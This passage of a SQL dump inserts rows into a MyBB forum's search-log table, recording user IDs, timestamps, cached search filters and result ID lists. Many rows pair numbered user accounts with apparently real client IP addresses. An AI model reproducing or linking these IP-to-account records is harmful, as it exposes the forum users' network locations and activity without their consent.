(\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('114910b66ef285e5c36918385412a753', '257', '1352767995', '203.104.11.7', '', '', 'threads', 't.lastpost >=\'1352681595\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('ca1592ae4753c1e744be5348dcfeec16', '257', '1352767971', '203.104.11.5', '', '', 'threads', 't.lastpost >=\'1352681571\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('1d6a97ae90091de306a6ff10c509e2a3', '342', '1352765268', '96.21.227.16', '', '', 'threads', 't.uid=\'342\' AND t.fid NOT IN (\'31\',\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'45\',\'55\',\'28\',\'29\',\'54\',\'30\',\'84\',\'44\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'342\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('1ce8ba15abd501e2a91147bfbb98e756', '2', '1352765419', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('1994d50cf225dd1bda223e8361259b56', '2', '1352765483', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('2e8d1cb0210ca2f918742ccc0824e298', '2', '1352765553', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('db00093e86b599a1c0c6240d190ae712', '2', '1352765607', '173.206.176.158', '2,4,5,9,21,24,207,237,263,304,305,480,952', '7521,7520,7519,7271,7253,7252,7127,7126,7125,7034,7033,7032,6980,6976,6975,6901,6900,6899,6898,6789,6788,6708,6672,6566,6565,6564,6518,6517,6516,6469,6387,6315,6304,6288,6211,6063,6053,6047,6045,5878,5877,5819,5796,5787,5771,5770,5730,5728,5724,5723,5722,5661,5659,5652,5639,5586,5527,5526,5446,5366,5364,5098,5097,4992,4987,4985,4827,4826,4825,4794,4707,4706,4705,4704,4662,4565,4563,4364,4362,4359,4279,4214,4118,4117,3423,3422,3421,3328,3298,3294,3261,3243,3231,3230,3178,3090,3089,3088,2961,2960', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('311d677dfd80c4f403c37ca91b4ed016', '257', '1352767932', '203.104.11.7', '', '', 'threads', 't.lastpost >=\'1352681532\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('559331a2fc48d8f3babffc84cfa4c4b6', '1', '1352767456', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352681056\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('3d5a4a2830be737226e80a37abec09be', '257', '1352767500', '203.104.11.7', '', '', 'threads', 't.lastpost >=\'1352681100\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('76fb1c648067ab76562d0e906201bb44', '1', '1352767343', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352680943\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('2916fab38f0ae28b5f775a022de32412', '1', '1352767246', '72.231.24.165', '', '', 'threads', 't.uid=\'1\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('a469d2b635872a13e7e6d233fbb2f6c6', '2', '1352766714', '173.206.176.158', '', '', 'threads', 't.lastpost >=\'1352680314\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('dc73ef3e2c035b6f18faf22be5bce92b', '1', '1352767189', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352680789\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('35ef479d3a46194cd29369823f35a443', '1', '1352767244', '72.231.24.165', '1,6,8,10,12,26,18,22,28,29,34,36,37,38,39,40,43,50,51,58,59,60,73,79,80,90,91,96,97,98,99,111,115,116,118,119,121,122,124,125,132,134,154,155,163,164,174,175,179,181,187,196,204,210,212,234,233,235,252,255,262,264,265,274,286,299,308,307,309,314,313,327,328,331,334,344,348,350,359,358,362,363,365,366,367,368,382,395,429,437,462,469,471,475,477,503,511,516,523,526,530,559,595,596,600,601,606,645,649,653,684,690,691,697,730,733,734,735,747,788,833,861,864,875,884,887,889,906,1002,1019,1029,1030,1031,1032,1052,1103,1142,1155,1169,1166,1173,1190,1204,1217,1219,1240,1241,1245,1246,1248,1256', '7514,7513,7510,7509,7508,7506,7502,7499,7498,7467,7466,7465,7432,7407,7405,7404,7345,7344,7340,7339,7337,7336,7325,7324,7310,7296,7269,7265,7264,7263,7262,7248,7247,7229,7228,7227,7225,7188,7187,7184,7180,7178,7155,7140,7139,7137,7135,7086,7085,7084,7059,7058,7056,7055,7054,7053,7052,7036,7007,7006,7005,7004,7003,7002,6989,6964,6963,6952,6909,6904,6897,6896,6895,6872,6868,6867,6846,6845,6836,6824,6823,6817,6816,6815,6814,6810,6808,6807,6806,6738,6737,6713,6693,6686,6684,6683,6682,6681,6616,6581', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('ed62f57831bf99a74dfe5bc10ae83276', '257', '1352764906', '203.104.11.6', '', '', 'threads', 't.lastpost >=\'1352678506\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('67bd42f21b5e835d2fa87d2f37a6928e', '257', '1352765033', '203.104.11.8', '', '', 'threads', 't.lastpost >=\'1352678633\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('555993bf0e167312debf765a917c5e6c', '2', '1352765624', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('f8ad7589b745535195582ef90124a708', '82', '1352763234', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352676834\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('5ff8e4fdd3a36314dbf55b009dcd794f', '82', '1352763000', '24.212.197.164', '', '', 'threads', 't.uid=\'82\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('cbe6cc0179a3035567fe7e79935d5c11', '1', '1352762498', '173.245.64.175', '', '', 'threads', 't.lastpost >=\'1352676098\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('d040d2790babaa1ba8ff3c7da09479c2', '82', '1352762459', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352676059\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('10535fa97615f14c594c052c591b78bb', '1', '1352761451', '72.231.24.165', '', '', 'threads', 't.uid=\'1\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('e0ab83e025ea358cb6326885fac78a57', '1', '1352761431', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352675031\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('07845418e15df0963d99e0c2dbaad516', '2', '1352765200', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('e94bebc07cd555b6d080b3885cd0073c', '2', '1352765268', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352433307\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('7eb71a6a92ae2b185522dc2ec6e0c5b2', '82', '1352769133', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352682733\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('b84af78eddce5cfb677ab66253be1288', '4', '1352770204', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352683804\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('dce0ec6e49832f071462621ecc57ab0e', '82', '1352770430', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352684030\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('63a1fb28acaf0fbe364cc35f2c7f3318', '2', '1352770589', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352766717\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('5e37680562bdf8b4e8cad40830cd4fb5', '4', '1352770929', '72.231.24.165', '1,6,8,10,12,26,18,22,28,29,34,36,37,38,39,40,43,50,51,58,59,60,73,79,80,90,91,96,97,98,99,111,115,116,118,119,121,122,124,125,132,134,154,155,163,164,174,175,179,181,187,196,204,210,212,234,233,235,252,255,262,264,265,274,286,299,308,307,309,314,313,327,328,331,334,344,348,350,359,358,362,363,365,366,367,368,382,395,429,437,462,469,471,475,477,503,511,516,523,526,530,559,595,596,600,601,606,645,649,653,684,690,691,697,730,733,734,735,747,788,833,861,864,875,884,887,889,906,1002,1019,1029,1030,1031,1032,1052,1103,1142,1155,1169,1166,1173,1190,1204,1217,1219,1240,1241,1245,1246,1248,1256', '7525,7524,7514,7513,7510,7509,7508,7506,7502,7499,7498,7467,7466,7465,7432,7407,7405,7404,7345,7344,7340,7339,7337,7336,7325,7324,7310,7296,7269,7265,7264,7263,7262,7248,7247,7229,7228,7227,7225,7188,7187,7184,7180,7178,7155,7140,7139,7137,7135,7086,7085,7084,7059,7058,7056,7055,7054,7053,7052,7036,7007,7006,7005,7004,7003,7002,6989,6964,6963,6952,6909,6904,6897,6896,6895,6872,6868,6867,6846,6845,6836,6824,6823,6817,6816,6815,6814,6810,6808,6807,6806,6738,6737,6713,6693,6686,6684,6683,6682,6681', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('a6484356417ff81d62f079296a820034', '82', '1352771379', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352684979\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('24cd85f40b82d4330f935f0821a21e5b', '222', '1352771395', '74.67.7.114', '15,13,14,16,19,30,31,41,42,52,66,81,100,101,156,198,199,214,215,216,301,302,470,505,506,507,527,537,775,832,883,1028,1130,1131,1139,1170,1171,1172,1183,1184,1185,1186,1234', '7458,7454,7452,7450,7400,7399,7341,7334,7309,7308,7307,7306,7305,7301,7300,7299,7138,6998,6997,6996,6960,6959,6958,6957,6956,6954,6953,6910,6843,6842,6840,6839,6838,6837,6657,6577,6576,6575,6571,5956,5929,5928,5927,5926,4784,4371,4370,4369,4368,4367,4366,3997,3995,3994,3993,3420,3419,3418,2710,2709,2708,2707,2706,2655,2652,2649,2648,2647,2646,2528,2527,2526,2525,2523,2522,2211,1577,1447,1405,1404,858,857,856,714,713,712,711,710,584,583,449,448,382,298,241,240,239,238,192,191', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('84bbd5f165d658ec94ff2bc057583b63', '342', '1352772268', '96.21.227.16', '', '', 'threads', 't.uid=\'342\' AND t.fid NOT IN (\'31\',\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'45\',\'55\',\'28\',\'29\',\'54\',\'30\',\'84\',\'44\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'342\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('2ce39304b702d4aef6febd7f5e6c820f', '82', '1352773305', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352686905\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('f10ad92dff6a29618f16b747f47a1e4a', '82', '1352774160', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352687760\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('7a64d8fd9d109686c46013ce2342d358', '82', '1352774357', '24.212.197.164', '', '', 'threads', 't.lastpost >=\'1352687957\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'82\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('3417775e09207421da556076abe9b370', '4', '1352774378', '173.245.64.158', '', '', 'threads', 't.lastpost >=\'1352687978\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('8b66292b4bdac0546a1e0e065e798445', '1', '1352785190', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352698790\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('503dbf0e89be18326845300301dd6246', '1', '1352785609', '72.231.24.165', '', '', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('76301ce9972f312b1b1c10abf3bc52de', '1', '1352788650', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352702250\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('d1f944705659f6562ed595dda7cbdedc', '1', '1352788676', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352702276\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('6e483a0350cc4809b3796b7c73a7d9ed', '62', '1352796129', '188.140.117.178', '', '', 'threads', 't.lastpost >= \'1352758538\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'62\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('52207331c49baa48179be6ca57d5788e', '62', '1352798939', '188.140.117.178', '', '', 'threads', 't.lastpost >= \'1352796167\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'62\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('2fc64d3b363521c493f4424f32b26507', '346', '1352805844', '70.174.59.159', '1258', '7545,7535,7533,7530,7529', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('9002e19e83bdc0b72530216bde8ce61d', '67', '1352811103', '193.161.89.202', '130,205,206,271,289,325,384,945,1134', '7291,7290,7241,7240,7224,7223,7196,7195,7194,7107,7106,7068,7067,6802,6801,6773,6772,6771,6767,6692,6637,6586,6585,6584,6583,6563,6448,5781,5288,5282,5100,5095,4637,2315,2230,2228,2126,2123,1928,1875,1863,1831,1829,1804,1792,1767,1766,1606,1515,1484,1483,1438,1432,1423,1354,1345,1333,1332,1331,1330,1329,1267,1250,1248,1247,1246,1232,1231,1230,1129,1113,1112,1053,979,950,941,931,928,812,803,798,797,793,791,783,773,771,769,751,743,736,735,734,679,678,518,458,432,427,403', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('167bcd5fadba1187b584eea6cd8b51c1', '2', '1352811678', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352781275\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('3998d32f696ab6b639524f3f7c940ef5', '2', '1352811704', '173.206.176.158', '', '', 'threads', 't.lastpost >= \'1352781275\' AND t.fid NOT IN (\'36\',\'48\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('c68aebdca4a4cdbd5887019215f8fbc5', '258', '1352817395', '139.190.235.246', '', '', 'threads', 't.lastpost >= \'1352715427\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'258\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('dbcdc9a4aa324b39bcfa05ba1122d9e4', '258', '1352817667', '139.190.235.246', '', '', 'threads', 't.lastpost >= \'1352715427\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'258\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('6a549f8ca1c62215788d969518abd1b8', '62', '1352820822', '188.140.39.222', '', '', 'threads', 't.lastpost >= \'1352799126\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'79\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'62\') OR t.fid NOT IN(50))', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('e937bd8cfc80de45296ba5e503418e57', '1', '1352823634', '165.155.212.73', '1,6,8,10,12,26,18,22,28,29,34,36,37,38,39,40,43,50,51,58,59,60,73,79,80,90,91,96,97,98,99,111,115,116,118,119,121,122,124,125,132,134,154,155,163,164,174,175,179,181,187,196,204,210,212,234,233,235,252,255,262,264,265,274,286,299,308,307,309,314,313,327,328,331,334,344,348,350,359,358,362,363,365,366,367,368,382,395,429,437,462,469,471,475,477,503,511,516,523,526,530,559,595,596,600,601,606,645,649,653,684,690,691,697,730,733,734,735,747,788,833,861,864,875,884,887,889,906,1002,1019,1029,1030,1031,1032,1052,1103,1142,1155,1169,1166,1173,1190,1204,1217,1219,1240,1241,1245,1246,1248,1256', 